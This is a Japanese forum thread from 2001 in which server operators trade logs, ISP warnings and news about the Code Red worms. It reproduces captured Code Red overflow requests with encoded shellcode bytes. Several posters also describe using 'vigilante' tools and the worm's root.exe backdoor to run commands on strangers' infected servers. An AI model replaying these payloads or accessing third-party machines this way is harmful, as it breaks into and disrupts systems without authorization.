　　　　　　　　　　∠＿___ﾄ-┘ｚ＿_,―'￣Σ　Z ￣ヽ―-､＿ﾉ
　　　　　　　　　　　　　　　　　　　 '―ｚ＿,┴'~

>>398
こんなものが全世界に展開されたらSecurityFocusに対するDDoSだっつーの。
作者は訴えられるかも。

>>400 Getさん。
Tuxくんマンセーな方ですかねえ。でも、ageてるし。

おれもビオランテ入れてみた。HTTPDと共存できんのがいまいちだが結構良く
出来てる。走らせても「相手の情報(データ)を一切入手する事がない」点が
ポイントかな。-v -l オプション付けといた方がいいだろうね。

> 極めつけnet sendで警告メッセージ CodeRed Vigilante
> http://www.dynwebdev.com/codered/

>>399

漏れはこれにしておいた。shutdownはまずかろう。さすがに。

>極めつけnet sendで警告メッセージ CodeRed Vigilante
>　http://www.dynwebdev.com/codered/

>>403 ｽﾏｿかぶった。
Vigilante大人気！

>>404

やっぱそう思う？
う〜ん・・・じゃ、やっぱやめとこ。。

>>406

仮にそいつが１日に数百万円稼ぐECサイトだったらどーするよ？
やめといて賢明。Vigilanteにしとけ。

>>406
というか、それ以前にそのシャットダウンは動かないから意味ないよ

[20/08/01 00:20:09 JST] Decaffeinator: 49 of 172 total servers successfully decaffeinated.

Vigilanteの成功率は1/4〜1/3くらいだなあ。こんなもの？

どさくさに紛れてのftp/telnetが増えてきた・・・
どれも.tw

>>409

手動でroo.exe?/c+dirしても、半分逝くかどうかだから
ねえ。

バックドアが仕込まれて、しかも再感染して回りを再攻撃
していて、なおかつAdminでログオンしていないとダメだ
から1/4なら上等。

*.bai.ne.jp からしつこーく来るので管理者にメールしようかと
思うんすけど、これってどこのISP？

>>412 それくらい自分で調べろYO!
ttp://whois.nic.ad.jp/cgi-bin/whois_gw?key=BAI.NE.JP
↓
ttp://whois.nic.ad.jp/cgi-bin/whois_gw?key=ns1.gao.ne.jp
↓
ttp://whois.nic.ad.jp/cgi-bin/whois_gw?key=210.171.0.34

なんだこれ？ "GET /default.ida?"がなくて"HTTP/1.1"

203.90.1.151 - - [20/Aug/2001:10:42:25 +0900] "XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 167 - -

>>414
何度も何度も激しく激しくｶﾞｲｼｭﾂ

［海外］コードレットワームのケーブルやDSLへの被害が拡大（ＢＣＮ）
http://news.yahoo.co.jp/headlines/bcn/010820/cpt/15200000_bcncpt007.html

一ヶ月たったね

インターリンク、終息宣言
http://www.interlink.or.jp/notification/backno/2001/info016.html

ユーザ様の怒りはまだまだ解けていないようですが・・・

>一定の安全が確認されたことと、２０日からはウィルスが休止状態となると言われて
>いることから、今回設置を解除することとなりました。
ぶん殴っていい？

やっぱりぶつぶつ切れるぞゴルァァメールに耐えられなかったんでしょう

>>419
誰かメールしてやらないと、コードレッド少なくともインターリンク
のユーザーが最後まで残る、ケケケ

プライスロトのこの騒ぎ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=998241038
これってやっぱりCodeRedIIのバックドアからIISにしかけられて、
それを見たクライアントPCに被害が拡大という最悪のケースかしら？

既出ならスマソ

defalut.idaにcon\con仕掛けたらどうなる？

スマソwin2000意味無いね（鬱打診で来る

210.81.49.140 - - [20/Aug/2001:14:07:41 +0900]
210.81.49.143 - - [20/Aug/2001:16:38:32 +0900]
Apple Japan の Code Red II 二匹捕捉。ライバル OS 使うなよ (w

>>422
それはActiveXのセキュリティーホールが原因。
IE5.5やOutlookから感染するみたい。

>>426
Outlookでも感染するの？
OEは駄目そうだが。

>>426
パッチ当ててないIIS鯖が書き換えられた事を言っているのでは？

プライスロトがIIS使っててCodeRed感染→Web改竄→ActiveXでトロイ仕込まれる
って流れでよいのかしら？

>>426-427
つかMicrosoft VMの問題で、htmlファイルを表示すれば何でもやられる模様↓
http://www.microsoft.com/japan/technet/security/SecFaq.asp?sec_cd=ms00-075

http://www.priceloto.com/newscontent.asp?number=49&page=1&startpage=1
赤虫に感染していた可能性は高いね

とうとうCode Red IIの二次攻撃が始まったな・・

この期に及んでパッチ当ててなかったのかしら

http://puyon.pns.to/ida/baka_servers.txt

幹線サーバーのIP晒してるページって結構あるのね、、、
怖い怖い

うーん。プライスロトみたいな事があるなら、企業で感染してる所は
晒した方が自衛になったんじゃないのかなぁ。

言えてる。
これから企業の感染ホスト名は晒して、皆でnet send攻撃しよう（ｗ

まだいっぱい来るんで、あげ。

http://takuomix.homeip.net/codered.log
感染サーバー晒しあげ

これはコードレッドワムですか？

http://www.mietsu.tsu.mie.jp/
２００１年７月２５日にサーバーが攻撃され、ドメインコントローラーを奪われました。
そのため、従来のサービスを続けられなくなりました。
お詫びいたします。
今後の運営について検討中です。

7/25なら違うと思われ

赤虫�U、再び増加傾向か？
http://www.security.nl/misc/codered-stats/

>>441
私も見ましたが週単位の周期のような気も

このスレもそろそろ終わりかねえ。
もっとも、慣れた頃が危ないのかもしれないが。

444GET

>>443

慣れたっていうより飽きたんじゃないっすか？(w

今日ようやくOCN本体から「赤蟲警告」のメールが来た
危険なワームなので即対応してくださいだって・・・


おせーーーーーーーーーーーーーーーーーーーーー



ふぅ、すっきり

>>445
プロバイダ側の論理だと、何もわからないユーザに警告しちゃうと
びっくりしてIIS止めちゃうので、「こいつは感染してる」ってわ
かるように、しばらく現場保持させとこうって考えもあるんだぞ。

漏れは賛成できないがな。

>>446
警告すると逆ギレする顧客がウザいから放置してんじゃないかな。

CodeRedで広がる波紋――英損保業者，IISユーザーの保険料を値上げ

英保険ブローカーのJ.S. Wurzlerはこのほど，IISを利用する顧客の保険料を最大15％値上げした。
同社によれば，Microsoft製品はハッカーの被害に遭いやすく，その分，MS製品のユーザーの
保険料を引き上げるのは理に適っているという。



http://www.zdnet.co.jp/zdii/0108/21/hn_001.html

いまだに定期的に、サイトチェックしてくれてる方感謝。
そろそろ寝る

>>448
最後にこのネタおもしろい
リンク追加

でもねエコノミーなのよ、うち・・・ま、それは良いとして
専用線で鯖立ててる奴も多かろうに、と思った次第す

某NG系でみたんだけど、ダミーでIISたててパッチ済みにしてネットに
繋ぐ。チェッカーで感染警報。なんで？ってのがあった。
パッチ不可能のモデルが来てるの？Logには今までと同じのしか飛んできてない
らしい。root.exe等作らないやつ。
詳細ｷﾎﾞﾝ。　鬱だね、IIS

チェッカーが馬鹿で誤検出する、というのが過去ログに
あったような気がする。

どうでもいいからシマンテック、TrendMicroその他ウイルス対策会社はIISをウイルスとして扱え

>>451
ウチの会社はスーパー引いてるけど、ウチも昨日だったよ。メール

以下全文

OCNサービスご利用のお客様へ
　　　　　　　　　　　　　　　　　2001年8月21日
　　　　　　　　　　　　　　　　　NTTコミュニケーションズ（株）
　　　　　　　　　　　　　　　　　OCNサービスセンタ


　　　　　　　「Code Redワーム」にご注意下さい


---------------------------------------------------------------
・緊急かつ重要な案件のため、通常OCNからの電子メールによるご案内
　を不要とされるお客様にも送信しております。
・全てのお客様にお知らせしている都合上、本メールの内容について、
　対策不要な環境でインターネットをご利用のお客様にもお送りして
　おります。お客様のご利用環境が対象なるかご確認下さい。
---------------------------------------------------------------


　日頃はOCNサービスをご利用いただきまして、誠にありがとうござい
ます。
　さて、既にマスコミの報道等によりご存知の方もいらっしゃるかと
思いますが、マイクロソフト社 Windows NT/2000 等のオペレーティン
グシステム製品に感染する「Code Red」と呼ばれるワーム型コンピュー
タウィルスとその変種が世界中で猛威を振るっており、OCN でも多くの
お客様ににその被害が広まっています。

　マイクロソフト社のInternet Information Services(以下、IIS)及び
Index Server/Serviceを搭載するWindowsNT/2000等のオペレーティング
システム製品は、IISを実際にご利用になっていない場合でもCode Red
に感染する可能性があります。

　感染すると他のIISサーバを攻撃すると共に、自分自身にはインター
ネットから不正侵入することができるバックドア（ハッカーがしのびこ
むための裏口）をサーバに仕掛けるため、早急な対策を強くお勧めしま
す。

具体的な対策はマイクロソフト社等のホームページをご覧下さい。

つづき

===============================================================
Code Red による深刻な問題に対する防護策と対処方法についての説明
---------------------------------------------------------------
http://www.microsoft.com/japan/technet/security/codeptch.asp
※このホームページにはWindows NT 4.0/Small Business Server 4.5
　Windows 2000/Small Business Server 2000の具体的な対策方法が
　紹介されています。

===============================================================
Windows 2000 Professional 用 Code Red ワーム対策ガイド
---------------------------------------------------------------
http://www.microsoft.com/japan/technet/security/codestep.asp
※このホームページにはWindows 2000 Professionalの具体的な対策方
　法が紹介されています。

===============================================================
Code Red II ワームの既知の影響を排除するツール
---------------------------------------------------------------
http://www.microsoft.com/japan/technet/security/redfix.asp
※このホームページにはCode Red IIが仕掛けるバックドアの修復ツー
　ルが紹介されています。最近はCode Red IIの感染報告が増加してい
　ますので、是非確認されることを強くお勧めします。

　上記ホームページの内容をご確認頂いた後、内容にご不明な点があ
れば下記マイクロソフト社様専用窓口にお問い合わせ下さい。

・マイクロソフト IIS セキュリティ情報センター
　TEL:0120-69-0196
　営業時間：9:00〜21:00まで有人対応(平日、土日祝日)
　　　　　　21:00〜翌9:00まで自動応答

===============================================================
Code Red チェックツール
---------------------------------------------------------------
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3057

※このホームページにはCode Redが利用するセキュリティホールの
　有無を確認できるツールが紹介されています。

　また、OCNホームページ「サポートからのお知らせ」にはCode Red に
よって影響を受けるダイヤルアップルータ等の情報も記載しております
のでご参考になさって下さい。

Code Red ワームに関する情報
http://www.ocn.ne.jp/announce/2001/0803.html

※既に対処済みの場合には、入れ違いのご連絡となりましたことをお詫
　び申し上げます。

　なお、本件に関してましてご不明な点がございましたら、下記の窓口
までお問い合わせ下さい。

日本ビジネスコンピューターから赤虫きたんだけど、
http://www.jbcc.co.jp/information/idc_index.htm
これって大丈夫かよ（w

>>458
ガンバって将来のユーザーを増やしてるんだろ？

IISで単純に長いURLをRejectするモジュールが出たみたいね。

>>445 >>455
私はOCNのダイアルアップユーザーですが、20日の朝に届いたよ。

>>461
ダイアルアップでも感染するからね。
問題なのは｢エコノミー｣以上の専用線ユーザ(ほとんどサーバ立ててると思われる)
への通知が今ごろだったって事。
OCNはサーバ用OSにNT推奨してるんだよね。
なのにIISのセキュリティホールの勧告なんて、今まで一回も無かった。
こういう情報は、専用線接続の全ユーザにきっちり流すべきだと思う。

>>445
今さらって思ってはいるよ。

いろいろあるんだよO○N内でもさ
7月の後半に注意喚起しようとしても
GOサインが出なかったんだよ。

>>463
あのセキュリティホールって6月だったような・・・

そろそろ、サポートセンターの方々の愚痴が聞きたいナ

>>464
MSのネタではね。
実際に感染を確認したのは7/19,20だけど、絶対数が足りなかった。

実際に何か大規模に起きないと動かない人達なので、事が発生して
それなりの申告(内外の)があって初めて検討するからね。
権限あるところに、判る人がいないのが今回の時期はずれメールの原因

あと、Webサーバに関しては客側に全責任がある。
サポートは一切しないはずです。パッケージ契約でなければ。

>>465
どのようなこと？

>>462
激しく同意。
私もあのメールが来たときには、やっと来たか・・・ってオモタYO。
現に専用線からのアタックも多かったし、ダイアルアップからもひっきりなしに
アタックがあったし・・・
最低でも専用線ユーザーには早い段階で通知して欲しいと思ふ。

かくいう私もダイアルアップで感染したし、赤虫も2ちゃんで初めて知った厨房。
（その後再インスト　IIS未インスト+SP2＋パッチで対策済み）

鬱だ市んでくる・・・

あんま早いのもちょっとね。
掲示板の情報パクって検証もせずに通知してんじゃねーだろーとか勘ぐっちまう

ばかたれども。
なんでプロバが馬鹿ユーザが立てた鯖の心配しなきゃいかんのだ。
NT推奨だと?お前らにUNIX推奨しても使いこなせねえで変な質問ばっか
よこすからしかたなくNTにしとけって意味なんだよ。けっ。
なんか勘違いしてんじゃねえか?

>>469

＞なんでプロバが馬鹿ユーザが立てた鯖の心配しなきゃいかんのだ。
東京めたりっくみたいになるからだろ?

>>469

＞NT推奨だと?お前らにUNIX推奨しても使いこなせねえで変な質問ばっか
＞よこすからしかたなくNTにしとけって意味なんだよ。けっ。

だから、UNIXも扱えんアホばかりだからIISのセキュリティホールの勧告を出しとけってことでしょ

拡張子が.aspってマカフィってＩＩＳ使ってるんすかね？
別に何使おうが勝手なんですけどね
セキュリティを扱う会社にしては珍しいんじゃないかなーっと

え？.aspって全部IISなの？
知らんかったわ。

なんかトップページ以外はほぼ全部asp。
経営母体のネットワークアソシエイツも同じ構成みたい。

http://www.nai.com/
ここのwebサーバーのレスポンスメッセージのヘッダー

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 22 Aug 2001 17:42:59 GMT
Connection: Keep-Alive
Content-Length: 38183
Content-Type: text/html
Cache-control: private

やっぱりIISだね

厨房には解らんかもしれんが、
コスト削減が主流の、現代の企業にとって
セキュリティに問題があっても
NTは、必要なのだよ。
Sunは、ハード＆サポートの面で、きついのだよ。

コスト削減の為にNT？

ちなみに、Linux、FreeBSDは、サポートが駄目駄目なので
基本的には、却下だな。
やっぱ、サポート料払って、責任丸投げできなきゃ
使わん。

逆に今回みたいにセキュリティに問題があったため損害を被ったときのコストは計算に入れてないのね。


しかもwebサーバーの6割がサポートなしのapacheを使ってる。サポートがなきゃダメなんじゃないの?

>>479
被害があっても、金銭的に莫大な被害が無いかぎり問題ないのじゃよー。
信用を失う事も3万件の顧客情報が漏れてもへっちゃらな日本にはさほど問題じゃないのじゃよー。
被害者面でおきらくごくらくーぅ。

NT vs 他のOS議論はお腹いっぱいだからよそうよ。
なんか新しい動きがあったみたいだね。
http://memo.st.ryukoku.ac.jp/archive/200108.month/1078.html
ってのがセキュリティホール memoで紹介されていた。

>>398
来ちゃったよ。Apache::CodeRed の自動応答が(藁。
お馬鹿なダイヤルアップユーザは減らないなぁ。ちゃんと周知はしてるんだけど。

From: [email protected]
Message-Id: <[email protected]>
Mime-version: 1.0
Date: Wed, 22 Aug 2001 14:05 -0300
Subject: CodeRed infection on 'xxxxxxxx.xxxx.ne.jp.': Automatic report
To: [email protected], [email protected],
[email protected], [email protected]
Content-transfer-encoding: 8bit
Cc: [email protected]
Content-Type: text/plain; charset="iso-8859-1"


Your Microsoft IIS server (at 123.45.67.89) appears to have been
infected with a strain of the CodeRed worm. It attempted to spread to
our Web server, despite the fact that we run Linux and Apache (which
are immune).

You should immediately download the security patch from Microsoft, from
<http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp>.

123.45.67.89 Wed Aug 22 14:04:42 2001 adt

Brought to you by Apache::CodeRed 1.07 for mod_perl and Apache,
written by Reuven M. Lerner (<[email protected]> and running on
'xxxx.xxxxxxxx.net'.



Automatically generated by Apache::CodeRed 1.07 for mod_perl and
Apache, written by Reuven M. Lerner (<[email protected]> and
running on 'xxxx.xxxxxxxx.net'.

Apacheが、Solaris上で動いてれば
Sunのサーバーの保守の範囲に含まれるのだよ。
厳密に言えば、Apacheのアップグレードとかに
対するメンテナンス費用ってのは、ないかもしれんが。

＞対するメンテナンス費用ってのは、ないかもしれんが。

じゃぁサポートしてないじゃん

昨日の朝から変種が来てますなあ。
先頭あたりの「CodeRedII」→「_________」
あと送信先IPが少し違う。

いいなあ、ウチにはまだ来ないよ。
はやくこないかなあ。

http://www.security.nl/misc/codered-stats/
おちてねー？

>>487
遅いけど落ちてないよ。＞今は

>>466

>あと、Webサーバに関しては客側に全責任がある。
>サポートは一切しないはずです。パッケージ契約でなければ。

感染した奴にそう言ってしかるべきだが、野放しになっているアホユーザからいっぱい
要らんパケット貰って迷惑してる他ユーザとしては、ユーザ同士でかってにやれとい
わんばかりに知らん顔決め込まれたのは相当に不信に思ったのだった。

ユーザですら努力しているのだから、正直、プロバイダ同士で協力しあって安全で使い
やすいインフラにする努力はしてほしいところ。

やぷーが感染してるかにゃ〜？（ｗ

>>489
おっしゃることは分かりますが、代価を頂いてはじめて
サポート対象となることはご理解頂きたいです。

申告をいただければ、対象者に連絡はしていますが
踏み込んだ対応（利用停止等）を行っていないのも事実です。
→CodeRedに関しては

CodeRedの場合、規制すればWebの閲覧不可になるわけだし、
送受信されるパケットを許可無しに閲覧、規制することは
法律に触れますので...

「プロバイダ同士で協力しあって」は正直難しいです。
しかし「使いやすいインフラにする努力」は当然思慮すべきことですね。

急にサポセン口調になったな

業務上の社会的義務とかいったものもあるはずだよね。
廃液垂れ流しの工場なんかは規制されてしかるべしだし。

>>480

なるほど
信用落として売上げ落としてもお気楽なのね
技術盗まれてライバルに抜かれて無駄な開発費かけてもお気楽なのね
被害があっても金銭的に多少の被害ならお気楽なのね
被害者面して訴えられて裁判費用かかってもお気楽なのね


金かかってんじゃねーかよ。
コスト削減の意味ねー

>>491
ワームを垂れ流しているサーバーの通信を制限しても法律に触れるのか？
制限しない方がまずそうだけど。

>>476
これだけセキュリティーで問題が出ても、ちゃんと管理出来てると言えるの？
サポート費用だけ取られていない？

>>491
わたしのレスも型どおりっぽいのですが、ユーザの立場として思うのはこういうこと。
べつにここでサポートしてくれとか言うわけではないけど、プロバはほんとになんに
もできないのか、考えて欲しい。
当然、素人考えで勝手な部分もあるから割り引いて読んで(藁

・ユーザが対価として期待している通信の質・安全性が保たれているだろうか。
現状ではVPNサービスのように閉じた網サービスを除いては、安全さ、防疫といった
部分は必ずしも契約に含まれていないのは確か。
ただし安心を差別化要素とか、プロバ自身の信用の要素として捉えているのかどう
だろうか企業姿勢というか、業界全体の姿勢が、逃げているように感じられてしまう。
某コイズミではないが、改善改革に頭を使っているかどうかユーザには見えてこない
ように思う。
技術者でもないフツーの人がユーザになっている今では、セキュリティの問題、ユー
ザが許容・対処できるもの(アカウント管理)もあるが、防疫対策は素人の対処できる
範囲を越えてきた気がする。メールについてはプロバが防疫サービスを行うようになっ
てきた。お金はかかるが技術的な負担も軽くて対価に見合うと思っている。

・法律、業界の協力の問題
プロバイダに権限と同時に義務を持たせるように法律を変えるか、品質に対して業界
で自己評価基準でも設けてはいかがと思う。当然それは個々のプロバイダでは無理
で業界として取り組まないと。技術も運用も理解しない政治家がとんちんかんな法律
をつくりかねない。ユーザやプロバイダが主導で法律を起こしたほうがユーザとしては
受け入れやすい。
当然、法律等の整備がなされていない段階で今回のCodeRedにすぐ対処しろという
ことを主張したいわけではなくて、毎回、嵐が去るのを首をちぢこめて待っているだ
けのように見えるのが残念。いやそんなことはないというのを、今見せろといわないけど
いつか見せて欲しい。

ところで、
>> CodeRedの場合、規制すればWebの閲覧不可になるわけだし、
あきらかにユーザとしての契約上の義務に違反していて、警告して一定期間内に対処
されなければ、ぶったぎられて当然と思いますが、そんなに難しいのでしょうか。
単に、手間ヒマや逆切れユーザの対処がプロバに対して負担だから言い訳になって
しまっているように感じます。実態は法律よりコストや体制・パワーの問題ではないで
すか？
たとえば、マンションの管理者は、もちろん法律で許可された範囲の手段ながら、迷惑
な住人から近隣住民の利益を守る義務を負っていますし、実際にたいていの管理者は
注意くらいはしてるわけですよね。

>CodeRedの場合、規制すればWebの閲覧不可になるわけだし、

馬鹿? それともOCNには上りと下りを別々に規制できる技術者も
いないのか?

>送受信されるパケットを許可無しに閲覧、規制することは
>法律に触れますので...

東めたはポート80閉じましたが何か?

>>494
クラックされたからって信用が落ちて売り上げ落ちた所なんてあるぅ？
クラックされて情報漏洩で裁判費用でヒィヒィなんて所あるのぉ？
ないよねー。ないよー。
ぜんぜん、問題ないよー。
ニッポンジンイイヒトバカリ。ボクスキ、ボクスキ、ニッポンダイスキ。

500

>>499
クラックされるような会社にクレジット番号は送信したくないな。

>>499

とりあえずバックドア仕掛けられまくってる韓国とは取り引きしたくないな

memoからパチり。
http://www.hotwired.co.jp/news/news/20010824301.html

>>497
逃げの姿勢ですか、確かに収益性の無いものからは避けますよね。
でもこれから安全や安心もISPのサービスの一環となるでしょうから
企業努力の見せ所ですね。

「ぶったぎられて当然」は個人的にはそう思います。
SPAM等に関しては時間がかかりましたが規約改正等で厳しい
対応が可能となりましたが、CodeRedのように流行りものの
ようなものには対応しきれていないのが現実です。
約款や規約改正は簡単には行えないのです。
(言っていて情けないが)

>実態は法律よりコストや体制・パワーの問題ではないですか？
その通りです（苦笑）詳しくはコメントできませんが...

>>498
私個人はｳﾞｧｶですが、周りの人達はそうではないですよ。
技術的には当然可能ですが、現行の規約ではCodeRedで
利用停止にはできませんので、仮に特定のポート止める
にしてもフィルタ設定と対応パターンを全ての設備に
導入するのは、コスト面と人的面で不可能だし...

その点、東めたさんはすごいと思いますよ。
止めちゃったんだから...

うちの設備がユーザから出るCodeRedパケットで
パンクするようなら止めちゃったかもしれませんけどね。

ttp://www.meti.go.jp/meti_hou/body/00000229.html

そろそろﾔﾊﾞｿなので自粛します。

また変種が来てるようですな。
ご丁寧に裏口が塞がれてる模様。
ＭＳが流したのかな？ｗ

１週間前にメールで警告したサイトの管理者より、携帯へ御礼の伝言が入っていた。
おらぁ番号知らせた覚えは無いぞ。有る意味ゾッとした。気持ち悪いんで関わりたくない、ほっておこう。

それはすごいな、どうやって調べたんだろう。
つーか、会社にTELで問い合わせしたのかも。

>>499

あのぉサポート料って「裁判費用でヒィヒィ」ってほど高くないと思いますよ

Code Red IIの変種「CodeRed.d」が出現
http://www.zdnet.co.jp/news/0108/25/b_0824_08.html

↑って上の方ででてるcoderedIIの部分を_____にしてある奴の
事だね。ログからじゃ判別できないな。

>>509
永遠に続くかもしれないだって。
イヤになっちゃうねぇ。

>509
この変種って、同じところから何度もアタックしてるやつだと思って
いいんでしょうか？、、
とすると、前のはIPの近い所からが多かったですけど、今度のは、
202.160.29.180から24回 24.178.213.75から39回
213.93.157.39から80回 212.114.170.252から78回
66.90.139.148から51回 202.65.200.43から42回
って感じで世界各地からの攻撃ですよね？、、
これだと以前の奴よりトラフィックに与えるダメージ大きくないですか？、、
誰かやるかもって思ってたけど、、はぁ、、

>509
９月末までのタイマーは外されたのだろうか？

>>513
どうなんだろ。ディスアセ見るとたぶん2バイト書き換えただけで無効にできるけど。

今日、Apache入れていろいろ設定して127.0.0.1で接続確認。
で、ちゃんとログとれてるか確認してみたら…
第一アクセスが、"GET /default.ida?XXXXXXXXXXXXX・・・

鬱。

なんちゃってIISユーザーの次は、
なんちゃってApacheユーザーの増加ですか・・・

クラックされんなヨ

test

interqが多い。。。。
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX

インターq経由

http://www.microsoft.com/security/mpsa/
これいいね。

マ小手先のイクロソフト逝ってよし。

Code Redってドリンクの名前だったって、既出ですか？
マウンテンデューの赤いやつなんですって。
でもって今それバカ売れなんですって。

「７月にカリフォルニアのプログラマー２人が新しいウィルスを
　発見した。２人はこのウィルスをそのとき飲んでいたソーダに
　ちなんで『コード・レッド』と名づけた」

ソース
ttp://www.adage.com/news_and_features/features/20010827/article2.html

うん、とっても既出。

明日からコードレッドは休みに入ります。
新学期からまた復活するが(W

>>523
8/30じゃなくて9/30だYO!

"永遠の命を持った『Code Red』ワーム "だってさ！

ttp://japan.cnet.com/News/2001/Item/010828-3.html

それ、上の方でも紹介されてたような気がするけど、
日付チェックの部分には触れられてないよね。
なんか、事実誤認なのかな。

CodeRedProveがバージョンアップしてたよ。
CodeRed.dも検知出来るようになったみたい。

うーん、.dの方も結構来るね・・・

>>523
それはCODE RED 1のことだよ

>>526
525はCODE RED 3のことだよ。CODE RED 2じゃないよ

XPはデフォルトでPFWついてるらしいが、IIS立ててても感染しないのかな？

>>528
いや、だから、そのcode red3だかcodered.dだかは日付チェックが
　はずしてあるのかな？というのが疑問なんだがなあ。

あのー
おとりこみちゅーすみません。
これ−＞ ttp://www.security.nl/misc/codered-stats/
のイジョーな増え方って何かのバグですよね？きっと？

>>531
以前も突然最後が振り切ったことがあるけど、横軸が長くなると右端がバグっている
ように思われる。前回は1〜2日たったら治ったけど。

http://www.icnet.ne.jp/codered.htm
がいしゅつだったら申し訳ない

>>533
よくわからんな・・
planexのBRL-01はNATルータだろ。
Code RedはWindows用のコード。
それが感染するのならBRL-01はWindowsで動いてることになるが、
そんな高くて信頼性の低い仕様を採用することはあり得ないぞ（ｗ

10〜20分に1回アタック食らうんだけど、これって正常？

>>534
客先にBRL-01が有りました。CodeRedで逝きました。
現象としては、WAN側のDHCPが無効になって固定IPになったりNATが無効になったりと、
パラメータがめちゃくちゃになります。
おそらくは、バッファオーバーランでパラメータ管理領域を上書きしてしまっているのだと思われ。
当然、CodeRedのコードが走るわけではありませぬ。

>>536
それならわかるぞ。
Code Redで障害を起こすルータにBRL-01が加わっただけのこと。

>＊現在CodeRedに感染されているユーザには個別にご連絡しております。
>　弊社よりご連絡のない方でも今後感染し、上記ルータがCodeRedの
>　発信元となる恐れがあります。
>　CodeRed対策をされるまでは利用されないようお願いいたします。

つーicnetの情報は間違いだ。

>>535 極普通かやや少な目。

IISは使ってないんですけど
/default.idaを作って遊べないんですか？

>>537
なにげに書き変わってるぞ。icnet

http://210.108.138.125/

>>541
sadmind. sadmindにやられているマシンってCodeRedにも
　やられてるね。

戚 凪戚走研 達聖 呪 蒸柔艦陥.
達壱 赤澗 凪戚走亜 肢薦鞠醸暗蟹 戚硯戚 痕井鞠醸暗蟹 析獣旋生稽 紫遂拝 呪 蒸柔艦陥.

--------------------------------------------------------------------------------

陥製聖 獣亀背 左淑獣神.

爽社 妊獣匝拭 凪戚走 爽社研 脊径梅陥檎 爽社研 舛溌備 脊径梅澗走 溌昔背 左淑獣神.

210.108.138.125 幡 凪戚走研 尻 陥製 据馬澗 舛左拭 企廃 元滴研 達生淑獣神.
及稽 舘蓄研 適遣馬食 陥献 元滴研 獣亀背 左淑獣神.
HTTP 404 - 督析聖 達聖 呪 蒸製
Internet Information Services


--------------------------------------------------------------------------------

奄綬 舛左(走据 昔径遂)

切室廃 舛左:
Microsoft 奄綬 走据

>>542
sadmind　だったのね、初めて見た（＾＾；教えてくれてありがとェ（＿ ＿）ェ
昨日から、アタックされてたから、何だろうと思って・・・
>>543
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://210.108.138.125/Default.htm
Date: Thu, 30 Aug 2001 05:02:19 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 24 Jul 2001 20:19:22 GMT
ETag: "01d6ec7d14c11:2020"
Content-Length: 289

<html><body bgcolor=black><br><br><br><br><br><br><table width=100%>
<td><p align="center"><font size=7 color=red>fuck USA Government</font>
<tr><td><p align="center"><font size=7 color=red>fuck PoizonBOx
<tr><td><p align="center"><font size=4 color=red>contact:[email protected]</html>

未だにこれなんだけど、見れない？

>>541
ノートン騒いでコンテンツロック掛かったゾ。そこ。
ﾜﾗﾀけど

>>545
えっ！、そうなの？、なんか変なところを書き込んだようで　ェ（＿ ＿）ェ
ノートン持ってないんで、確認できないけど、
アクセスログも、ソースも、怪しいところがないし
なんでだろ？。

ソースはオレも見たけど変なの無し。
直後からヤフページャ落ちたりエクセル表示変になったりだったけど、
原因解らず。
因果関係が解らなくて今一すっきりしない。欲求不まーん（ｗ

>>547
ん〜、ゴメンねー、俺がいかがわしいアドレス書いたが為に（＾＾；
パケットレベルで見ればなんか解るかもしれないけど・・・
Win2kの穴塞いで、糞ルーター取っ払ってネットに直つなぎする
元気ないですェ（＿ ＿）ェ

しかし、CodeRed　からのアクセスは気分が悪い・・・

うちのノートン君静かだったYO!
ソースみたけどスクリプト入ってないし。
HTML書き換えられただけとおもわれ。

追加　うちのノートン君はＮＩＳ2001の最新版だよー

会社で>>541見たら、NAV コーポレートエディション君のスキャンが入って
「Backdoor.Sadmindが見つかったけど検疫で止めたから安心したまえ」的な
コメントが出た。
その後は何もトラブルは起きてないよ。

sadmindにやられたページ見ても危険があるとは思えないから、
騒ぐソフトの方が変なのではないかなあとか思う。

今日はオークションとタイタニックかよ。

ところでcodered dってガセではないの？
サイトにリンクしていいのかどうなのか？
仕事が忙しくて調べる暇が無いスマソsage

どうせこて班だからキャップテスト
よごしてすまそ

おはよ
新宿爆破実況で飛ばなかったのね
もしかして２ちゃんは存続決定？
またよごしちゃった
最近忙しすぎて２ちゃんより先に俺の頭飛びそう。

pc198.hellobox.co.jp

こいつどうにかならんかな。しつこい上に教えてやりようがない。

Name: pc198.hellobox.co.jp Address: 211.120.14.198
株式会社ブルーバードオンライン (Bluebird Soft Inc)
BLUEBIRD-NET [211.120.14.192 <-> 211.120.14.255] 211.120.14.192/26
http://www.bluebird.ne.jp/ ここじゃないかな。

おお、ありがとう。早速メールしてみる。

え〜ん

>>559
(￣ー￣)ﾆﾔﾘｯ

え〜ん

>>561
ＩＤおれにぴったりじゃん(￣ー￣)ﾆﾔﾘｯ

>>559
>>561
その二つ何時間ぐらいで出た？おれめんどくさでやめちゃった。

>>563

>>559さんの書込みを見てからだから、１時間２５分以内だね。

どうしてこうzaqはバカばかりなんだ。

zaqd378bbcd.zaq.ne.jp

>565

ほんとまいるよな。っていうか、俺もザクだけど。
でも、ザクなんかよりこちとら大学の方がヤバイよ。
20台以上ヤラレテルっぽいのな…鬱

evd20010828-15.enc

種類:　ENC ファイル

場所:　C:\Program Files\Network ICE\BlackICE

サイズ:　1.55 KB

検疫:　2001年9月1日 22:23:16

未提出検疫

ノートンでレポートしたらコードレットワームに
ブラックアイスが感染していた
こんな事ってあるの？　　　

